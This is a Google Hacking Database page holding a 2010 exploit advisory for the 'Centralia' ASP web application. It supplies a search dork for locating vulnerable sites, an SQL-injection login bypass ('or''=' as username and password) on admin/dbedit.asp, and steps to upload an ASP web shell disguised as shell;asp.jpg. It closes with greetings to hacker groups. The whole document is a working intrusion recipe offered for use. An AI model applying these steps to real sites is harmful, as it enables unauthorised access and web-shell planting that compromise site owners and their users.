CVE Certified
GHDB

inurl:showcat.asp?id=

prev next

Google search: inurl:showcat.asp?id=

Hits: 7043

Submited: 2010-12-14

========================================
Centralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability


========================================

#################################################################
# Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability


# Date : 10 December 2010

# Author : ali.erroor

# Version : n/a

# Googel DorK : inurl:showcat.asp?id=

# Home : www.network-security.ir

# Email : ali.erroor@att.net


#################################################################

[+] Exploit

[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..


[-] http://localhost/path/admin/dbedit.asp?table=products

[-] username : 'or''='
[-] password : 'or''='


[2] Create New Upload Your Shell.Asp ..

[-] http://localhost/path/admin/dbedit.asp?a=upload_init


[3] To See Shell Edit Your uploads

[-] http://localhost/path/uploads/shell;asp.jpg

[+] Demo

[-] http://server/admin/dbedit.asp?table=products


[-] http://server/admin/dbedit.asp?a=upload_init




#################################################################

Great 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE
/ Cair3x /novin security team and all iranian hackers

#################################################################